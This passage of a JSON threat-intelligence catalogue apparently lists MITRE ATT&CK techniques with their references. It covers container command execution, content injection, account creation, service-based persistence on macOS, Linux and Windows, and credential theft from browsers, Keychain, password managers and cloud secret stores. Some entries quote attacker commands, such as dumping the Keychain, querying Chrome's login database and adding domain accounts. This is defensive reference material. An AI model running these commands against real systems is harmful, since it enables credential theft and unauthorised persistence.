"dest-uuid": "581722ea-81a5-4c73-a703-2c994f1cf814",
"type": "similar"
},
{
"dest-uuid": "ce71e252-3403-4287-a0b5-9328fa88af96",
"type": "similar"
},
{
"dest-uuid": "f2b5a3e4-8a59-41f5-88c4-142f2da251c8",
"type": "similar"
},
{
"dest-uuid": "3bd8c928-a7c8-4376-8f2f-2e0fcb449b37",
"type": "similar"
},
{
"dest-uuid": "ef312a77-6b1a-4be6-a220-3c689e7fcd9d",
"type": "similar"
}
],
"uuid": "c12d81d3-abe4-43d7-8a65-f4b3150e722d",
"value": "Compromise Infrastructure"
},
{
"description": "Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.<sup>[[Docker Daemon CLI](https://app.tidalcyber.com/references/ea86eae4-6ad4-4d79-9dd3-dd965a7feb5c)]</sup><sup>[[Kubernetes API](https://app.tidalcyber.com/references/5bdd1b82-9e5c-4db0-9764-240e37a1cc99)]</sup><sup>[[Kubernetes Kubelet](https://app.tidalcyber.com/references/57527fb9-d076-4ce1-afb5-e7bdb9c9d74c)]</sup>\n\nIn Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as <code>docker exec</code> to execute a command within a running container.<sup>[[Docker Entrypoint](https://app.tidalcyber.com/references/c80ad3fd-d7fc-4a7a-8565-da3feaa4a915)]</sup><sup>[[Docker Exec](https://app.tidalcyber.com/references/5f1ace27-6584-4585-98de-52cb71d419c1)]</sup> In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as <code>kubectl exec</code>.<sup>[[Kubectl Exec Get Shell](https://app.tidalcyber.com/references/ffb9c0ca-533f-4911-8c0c-a2653410a76d)]</sup>",
"meta": {
"platforms": [
"Containers"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "0b9609dd-9f19-4747-ba6e-421b6b7ff03f",
"value": "Container Administration Command"
},
{
"description": "Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.\n\nThese resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.<sup>[[Docker API](https://app.tidalcyber.com/references/b8ec1e37-7286-40e8-9577-ff9c54801086)]</sup><sup>[[Kubernetes API](https://app.tidalcyber.com/references/5bdd1b82-9e5c-4db0-9764-240e37a1cc99)]</sup> In Docker, logs may leak information about the environment, such as the environments configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversarys next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. ",
"meta": {
"platforms": [
"Containers"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "41c4b4cc-99da-4323-b0f4-229906578501",
"value": "Container and Resource Discovery"
},
{
"description": "Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5) followed by [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381)), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) and other data to already compromised systems.<sup>[[ESET MoustachedBouncer](https://app.tidalcyber.com/references/6c85e925-d42b-590c-a424-14ebb49812bb)]</sup>\n\nAdversaries may inject content to victim systems in various ways, including:\n\n* From the middle, where the adversary is in-between legitimate online client-server communications (**Note:** this is similar but distinct from [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9), which describes AiTM activity solely within an enterprise environment) <sup>[[Kaspersky Encyclopedia MiTM](https://app.tidalcyber.com/references/353a6eb9-54c5-5211-ad87-abf5d941e503)]</sup>\n* From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server <sup>[[Kaspersky ManOnTheSide](https://app.tidalcyber.com/references/8ea545ac-cca6-5da5-8a93-6b07518fc9d4)]</sup>\n\nContent injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with \"lawful interception.\"<sup>[[Kaspersky ManOnTheSide](https://app.tidalcyber.com/references/8ea545ac-cca6-5da5-8a93-6b07518fc9d4)]</sup><sup>[[ESET MoustachedBouncer](https://app.tidalcyber.com/references/6c85e925-d42b-590c-a424-14ebb49812bb)]</sup><sup>[[EFF China GitHub Attack](https://app.tidalcyber.com/references/b8405628-6366-5cc9-a9af-b97d5c9176dd)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
},
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "3f95e4f2-cd4a-502c-a12a-becb8d28440c",
"value": "Content Injection"
},
{
"description": "Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.<sup>[[Microsoft O365 Admin Roles](https://app.tidalcyber.com/references/8014a0cc-f793-4d9a-a2cc-ef9e9c5a826a)]</sup><sup>[[Microsoft Support O365 Add Another Admin, October 2019](https://app.tidalcyber.com/references/c31cfc48-289e-42aa-8046-b41261fdeb96)]</sup><sup>[[AWS Create IAM User](https://app.tidalcyber.com/references/bb474e88-b7bb-4b92-837c-95fe7bdd03f7)]</sup><sup>[[GCP Create Cloud Identity Users](https://app.tidalcyber.com/references/e91748b2-1432-4203-a1fe-100aa70458d2)]</sup><sup>[[Microsoft Azure AD Users](https://app.tidalcyber.com/references/b69468a2-693e-4bd0-8dc1-ccfd7d5630c0)]</sup>\n\nAdversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.\n\nOnce an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://app.tidalcyber.com/technique/0799f2ee-3a83-452e-9fa9-83e91d83be25) or assigning [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1136.003"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "d6504a4d-f6d7-4517-b0fd-ec7128d4dec9",
"value": "Cloud Account"
},
{
"description": "Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1136.002"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "7a7e10ce-f033-460c-9183-5e29a9feb927",
"value": "Domain Account"
},
{
"description": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. \n\nFor example, with a sufficient level of access, the Windows <code>net user /add</code> command can be used to create a local account. On macOS systems the <code>dscl -create</code> command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as <code>username</code>, or to Kubernetes clusters using the `kubectl` utility.<sup>[[cisco_username_cmd](https://app.tidalcyber.com/references/8e7b99d7-ad94-5802-a1ee-6334842e7e0b)]</sup><sup>[[Kubernetes Service Accounts Security](https://app.tidalcyber.com/references/522eaa6b-0075-5346-bf3c-db1e7820aba2)]</sup>\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1136.001"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "287201c6-56c8-458d-a6b3-5d84ad1099d7",
"value": "Local Account"
},
{
"description": "Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.\n\nAccounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.",
"meta": {
"platforms": [
"Azure AD",
"Containers",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Network",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "d6504a4d-f6d7-4517-b0fd-ec7128d4dec9",
"type": "similar"
},
{
"dest-uuid": "7a7e10ce-f033-460c-9183-5e29a9feb927",
"type": "similar"
},
{
"dest-uuid": "287201c6-56c8-458d-a6b3-5d84ad1099d7",
"type": "similar"
}
],
"uuid": "55bcf759-a0bf-47e9-99f8-4e8ca997e6ce",
"value": "Create Account"
},
{
"description": "Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>~/Library/LaunchAgents</code>.<sup>[[AppleDocs Launch Agent Daemons](https://app.tidalcyber.com/references/310d18f8-6f9a-48b7-af12-6b921209d1ab)]</sup><sup>[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]</sup> <sup>[[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)]</sup> Property list files use the <code>Label</code>, <code>ProgramArguments </code>, and <code>RunAtLoad</code> keys to identify the Launch Agent's name, executable location, and execution time.<sup>[[OSX.Dok Malware](https://app.tidalcyber.com/references/71d65081-dada-4a69-94c5-f1d8e4e151c1)]</sup> Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.\n\n Launch Agents can also be executed using the [Launchctl](https://app.tidalcyber.com/technique/8edc6345-c423-4872-9e22-11e22d9164ff) command.\n \nAdversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the <code>RunAtLoad</code> or <code>KeepAlive</code> keys set to <code>true</code>.<sup>[[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)]</sup><sup>[[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)]</sup> The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.<sup>[[OSX Malware Detection](https://app.tidalcyber.com/references/0df0e28a-3c0b-4418-9f5a-77fffe37ac8a)]</sup><sup>[[OceanLotus for OS X](https://app.tidalcyber.com/references/6e9acc29-06af-4915-8e01-7dcccb204530)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1543.001"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "6dbe030c-5f87-4b45-9b6b-5bba2c0fad00",
"value": "Launch Agent"
},
{
"description": "Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.<sup>[[AppleDocs Launch Agent Daemons](https://app.tidalcyber.com/references/310d18f8-6f9a-48b7-af12-6b921209d1ab)]</sup><sup>[[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)]</sup><sup>[[launchd Keywords for plists](https://app.tidalcyber.com/references/1bcd2a93-93e7-48d8-ad25-6f09e94123aa)]</sup>\n\nAdversaries may install a Launch Daemon configured to execute at startup by using the <code>RunAtLoad</code> parameter set to <code>true</code> and the <code>Program</code> parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd)). When the Launch Daemon is executed, the program inherits administrative permissions.<sup>[[WireLurker](https://app.tidalcyber.com/references/fd33f71b-767d-4312-a8c9-5446939bb5ae)]</sup><sup>[[OSX Malware Detection](https://app.tidalcyber.com/references/0df0e28a-3c0b-4418-9f5a-77fffe37ac8a)]</sup>\n\nAdditionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as <code>usr/local/bin</code> to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.<sup>[[LaunchDaemon Hijacking](https://app.tidalcyber.com/references/51d1e4d9-265a-48ca-834b-4daa1f386bb4)]</sup><sup>[[sentinelone macos persist Jun 2019](https://app.tidalcyber.com/references/81a49043-cac5-40e0-a626-fd242d21c56d)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1543.004"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "eff618a9-6498-4b01-bca1-cd5f3784fc27",
"value": "Launch Daemon"
},
{
"description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.<sup>[[Linux man-pages: systemd January 2014](https://app.tidalcyber.com/references/e9a58efd-8de6-40c9-9638-c642311d6a07)]</sup> Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. \n\nSystemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).<sup>[[lambert systemd 2022](https://app.tidalcyber.com/references/196f0c77-4c98-57e7-ad79-eb43bdd2c848)]</sup> \n\nInside the `.service` unit files, the following directives are used to execute commands:<sup>[[freedesktop systemd.service](https://app.tidalcyber.com/references/cae49a7a-db3b-5202-ba45-fbfa98b073c9)]</sup> \n\n* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start.\n* `ExecReload` directive executes when a service restarts. \n* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped. \n\nAdversaries have created new service files, altered the commands a `.service` files directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.<sup>[[Anomali Rocke March 2019](https://app.tidalcyber.com/references/31051c8a-b523-4b8e-b834-2168c59e783b)]</sup><sup>[[airwalk backdoor unix systems](https://app.tidalcyber.com/references/3f3bca4a-68fa-5d4a-b86f-36f82345ff36)]</sup><sup>[[Rapid7 Service Persistence 22JUNE2016](https://app.tidalcyber.com/references/75441af3-2ff6-42c8-b7f1-c8dc2c27efe2)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1543.002"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "7aae1ad0-fb1f-484a-a176-c94e4c7ada77",
"value": "Systemd Service"
},
{
"description": "Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.<sup>[[TechNet Services](https://app.tidalcyber.com/references/b50a3c2e-e997-4af5-8be0-3a8b3a959827)]</sup> Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.\n\nAdversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. \n\nAdversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b)), or by using command-line utilities such as `PnPUtil.exe`.<sup>[[Symantec W.32 Stuxnet Dossier](https://app.tidalcyber.com/references/ef65ab18-fd84-4098-8805-df0268fc3a38)]</sup><sup>[[Crowdstrike DriveSlayer February 2022](https://app.tidalcyber.com/references/4f01e901-58f8-4fdb-ac8c-ef4b6bfd068e)]</sup><sup>[[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)]</sup> Adversaries may leverage these drivers as [Rootkit](https://app.tidalcyber.com/technique/cf2b56f6-3ebd-48ec-b9d9-835397acef89)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as \"Bring Your Own Vulnerable Driver\" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c).<sup>[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]</sup><sup>[[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)]</sup>\n\nServices may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://app.tidalcyber.com/technique/68427c7d-f65a-4545-abfd-13d69e5e50cf). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://app.tidalcyber.com/technique/86c2f355-3c97-44c1-9a83-e3d016f50535) (ex: using a service and/or payload name related to a legitimate OS or benign software component).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1543.003"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "31c6dd3c-3eb2-46a9-ab85-9e8e145810a1",
"value": "Windows Service"
},
{
"description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.<sup>[[TechNet Services](https://app.tidalcyber.com/references/b50a3c2e-e997-4af5-8be0-3a8b3a959827)]</sup> On macOS, launchd processes known as [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) and [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00) are run to finish system initialization and load user specific parameters.<sup>[[AppleDocs Launch Agent Daemons](https://app.tidalcyber.com/references/310d18f8-6f9a-48b7-af12-6b921209d1ab)]</sup> \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.<sup>[[OSX Malware Detection](https://app.tidalcyber.com/references/0df0e28a-3c0b-4418-9f5a-77fffe37ac8a)]</sup> ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "6dbe030c-5f87-4b45-9b6b-5bba2c0fad00",
"type": "similar"
},
{
"dest-uuid": "eff618a9-6498-4b01-bca1-cd5f3784fc27",
"type": "similar"
},
{
"dest-uuid": "7aae1ad0-fb1f-484a-a176-c94e4c7ada77",
"type": "similar"
},
{
"dest-uuid": "31c6dd3c-3eb2-46a9-ab85-9e8e145810a1",
"type": "similar"
}
],
"uuid": "f8aa018b-5134-4201-87f2-e55d20f40b17",
"value": "Create or Modify System Process"
},
{
"description": "Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault. \n\nSecrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables. \n\nIf an adversary is able to gain sufficient privileges in a cloud environment for example, by obtaining the credentials of high-privileged [Cloud Accounts](https://app.tidalcyber.com/technique/3c4a2f3a-5877-4a27-a417-76318523657e) or compromising a service that has permission to retrieve secrets they may be able to request secrets from the secrets manager. This can be accomplished via commands such as `get-secret-value` in AWS, `gcloud secrets describe` in GCP, and `az key vault secret show` in Azure.<sup>[[Permiso Scattered Spider 2023](https://app.tidalcyber.com/references/020b97ab-466d-52e6-b1f1-6f9f8ffdabf0)]</sup><sup>[[Sysdig ScarletEel 2.0 2023](https://app.tidalcyber.com/references/285266e7-7a62-5f98-9b0f-fefde4b21c88)]</sup><sup>[[AWS Secrets Manager](https://app.tidalcyber.com/references/ec87e183-3018-5cac-9fab-711003be54f7)]</sup><sup>[[Google Cloud Secrets](https://app.tidalcyber.com/references/4a9e631d-3588-5585-b00a-316a934e6009)]</sup><sup>[[Microsoft Azure Key Vault](https://app.tidalcyber.com/references/8f076aae-38c0-5335-9f7a-1e29b90fc33f)]</sup>\n\n**Note:** this technique is distinct from [Cloud Instance Metadata API](https://app.tidalcyber.com/technique/a5a95893-d837-424a-979f-095a47dd9f34) in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1555.006"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "260571a6-3c08-5419-98c5-3fa1aa8e675d",
"value": "Cloud Secrets Management Stores"
},
{
"description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup> Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, <code>AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data</code> and executing a SQL query: <code>SELECT action_url, username_value, password_value FROM logins;</code>. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function <code>CryptUnprotectData</code>, which uses the victims cached logon credentials as the decryption key.<sup>[[Microsoft CryptUnprotectData April 2018](https://app.tidalcyber.com/references/258088ae-96c2-4520-8eb5-1a7e540a9a24)]</sup>\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.<sup>[[Proofpoint Vega Credential Stealer May 2018](https://app.tidalcyber.com/references/c52fe62f-4df4-43b0-a126-2df07dc61fc0)]</sup><sup>[[FireEye HawkEye Malware July 2017](https://app.tidalcyber.com/references/7ad228a8-5450-45ec-86fc-ea038f7c6ef7)]</sup> Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://app.tidalcyber.com/technique/9503955c-fa53-452a-b717-7e23bfb4df83).\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.<sup>[[GitHub Mimikittenz July 2016](https://app.tidalcyber.com/references/2e0a95b2-3f9a-4638-9bc5-ff1f3ac2af4b)]</sup>\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1555.003"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "b4a1cbaa-85d1-4a65-977f-494f66a141e3",
"value": "Credentials from Web Browsers"
},
{
"description": "Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apples iCloud service. \n\nKeychains can be viewed and edited through the Keychain Access application or using the command-line utility <code>security</code>. Keychain files are located in <code>~/Library/Keychains/</code>, <code>/Library/Keychains/</code>, and <code>/Network/Library/Keychains/</code>.<sup>[[Keychain Services Apple](https://app.tidalcyber.com/references/0754f48d-dad8-480c-953c-256be4dfcfc3)]</sup><sup>[[Keychain Decryption Passware](https://app.tidalcyber.com/references/6a426ab4-5b0b-46d4-9dfe-e2587f69e111)]</sup><sup>[[OSX Keychain Schaumann](https://app.tidalcyber.com/references/d0ac448a-7299-4ddc-8730-be72fb840ccb)]</sup>\n\nAdversaries may gather user credentials from Keychain storage/memory. For example, the command <code>security dump-keychain d</code> will dump all Login Keychain credentials from <code>~/Library/Keychains/login.keychain-db</code>. Adversaries may also directly read Login Keychain credentials from the <code>~/Library/Keychains/login.keychain</code> file. Both methods require a password, where the default password for the Login Keychain is the current users password to login to the macOS host.<sup>[[External to DA, the OS X Way](https://app.tidalcyber.com/references/b714e6a9-5c12-4a3b-89f9-d379c0284f06)]</sup><sup>[[Empire Keychain Decrypt](https://app.tidalcyber.com/references/41075230-73a2-4195-b716-379f9e5ae93b)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1555.001"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "1ef8a053-ff13-4a10-b9d9-0a017880e4a5",
"value": "Keychain"
},
{
"description": "Adversaries may acquire user credentials from third-party password managers.<sup>[[ise Password Manager February 2019](https://app.tidalcyber.com/references/253104ab-20b0-43d2-8338-afdd3237cc53)]</sup> Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.<sup>[[ise Password Manager February 2019](https://app.tidalcyber.com/references/253104ab-20b0-43d2-8338-afdd3237cc53)]</sup>\n\nAdversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.<sup>[[FoxIT Wocao December 2019](https://app.tidalcyber.com/references/aa3e31c7-71cd-4a3f-b482-9049c9abb631)]</sup><sup>[[Github KeeThief](https://app.tidalcyber.com/references/3b6231fb-5b52-4a3a-a21f-0881901d0037)]</sup> Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef).<sup>[[NVD CVE-2019-3610](https://app.tidalcyber.com/references/889b742e-7572-4aad-8944-7f071483b613)]</sup>\n Adversaries may also try brute forcing via [Password Guessing](https://app.tidalcyber.com/technique/e849ebcc-e0af-45a5-aefa-c394bb759b4e) to obtain the master password of a password manager.<sup>[[Cyberreason Anchor December 2019](https://app.tidalcyber.com/references/a8dc5598-9963-4a1d-a473-bee8d2c72c57)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1555.005"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "9448cf6f-7ba3-41d1-8710-8e6f9b0572ee",
"value": "Password Managers"
},
{
